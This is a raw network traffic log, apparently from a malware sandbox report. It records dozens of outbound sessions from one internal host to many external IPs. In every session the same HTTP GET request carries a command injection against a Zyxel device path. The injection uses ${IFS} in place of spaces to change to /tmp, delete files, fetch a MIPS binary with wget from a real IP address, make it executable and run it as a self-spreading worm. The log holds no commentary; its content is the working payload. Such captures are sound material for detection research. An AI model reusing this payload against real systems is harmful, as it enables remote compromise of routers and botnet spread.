                                              Jan 29, 2024 07:04:01.238281012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7281192.168.2.14464044.144.161.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238311052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7282192.168.2.1453784100.147.2.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238364935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7283192.168.2.145733077.154.247.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238404989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7284192.168.2.1459068152.163.35.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238440037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7285192.168.2.1434254147.181.245.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238486052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7286192.168.2.1451816204.115.44.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238542080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7287192.168.2.144484444.22.53.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238555908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7288192.168.2.1453720158.161.159.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238610983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7289192.168.2.1442532189.206.190.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238636017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7290192.168.2.1440276169.89.97.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238670111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7291192.168.2.1434356107.13.82.101443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238719940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7292192.168.2.145687693.167.240.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238756895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7293192.168.2.1457262208.148.216.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238804102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7294192.168.2.1460440154.124.180.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238838911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7295192.168.2.1436436205.6.192.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238888979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7296192.168.2.1455124146.149.204.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238920927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7297192.168.2.1445764181.102.200.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.238956928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7298192.168.2.144279869.3.194.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.239011049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7299192.168.2.144072641.11.23.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.239042997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7300192.168.2.1450924168.29.13.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.239090919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7301192.168.2.1451126115.50.157.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.239130974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7302192.168.2.14529185.148.125.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:01.239161968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7303192.168.2.1439462129.233.36.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251264095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7304192.168.2.1439210219.191.171.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251297951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7305192.168.2.143383037.2.147.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251334906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7306192.168.2.143850277.204.197.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251374960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7307192.168.2.1437414179.15.20.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251415968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7308192.168.2.1454614144.85.151.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251439095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7309192.168.2.1454056153.77.254.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251504898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7310192.168.2.1435226115.72.43.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251523972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7311192.168.2.1453642174.213.185.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251574039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7312192.168.2.145063657.191.52.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251605988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7313192.168.2.1452500195.174.110.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251656055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7314192.168.2.1446434135.119.173.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251683950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7315192.168.2.1442248138.153.165.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251743078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7316192.168.2.1451916129.134.39.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251773119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7317192.168.2.143408867.57.40.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251821995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7318192.168.2.144244260.209.39.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251844883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7319192.168.2.1445442115.28.0.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251887083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7320192.168.2.146070093.144.40.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251902103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7321192.168.2.1443606172.184.220.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251940012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7322192.168.2.1434286117.195.33.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.251991034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7323192.168.2.144049276.108.70.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252021074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7324192.168.2.1447648147.24.153.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252037048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7325192.168.2.1458914121.107.107.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252072096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7326192.168.2.145624071.58.118.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252103090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7327192.168.2.145673896.228.220.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252137899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7328192.168.2.1445356213.203.239.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252173901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7329192.168.2.1439448149.69.81.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252219915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7330192.168.2.1457494113.39.191.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252250910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7331192.168.2.145943065.215.108.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252283096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7332192.168.2.145313062.227.119.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252319098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7333192.168.2.143423862.105.68.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252341032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7334192.168.2.144306652.209.229.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252388000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7335192.168.2.146025242.219.208.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252428055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7336192.168.2.14456941.26.101.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252455950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7337192.168.2.1449970204.250.208.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252495050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7338192.168.2.1447368125.49.138.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252559900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7339192.168.2.1455832184.146.225.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252599955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7340192.168.2.1460078134.39.46.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252614021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7341192.168.2.1459866140.93.103.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252675056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7342192.168.2.143449480.72.151.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252727032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7343192.168.2.145748686.52.83.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:02.252758026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7344192.168.2.1436492177.190.198.78443
                                              TimestampBytes transferredDirectionData
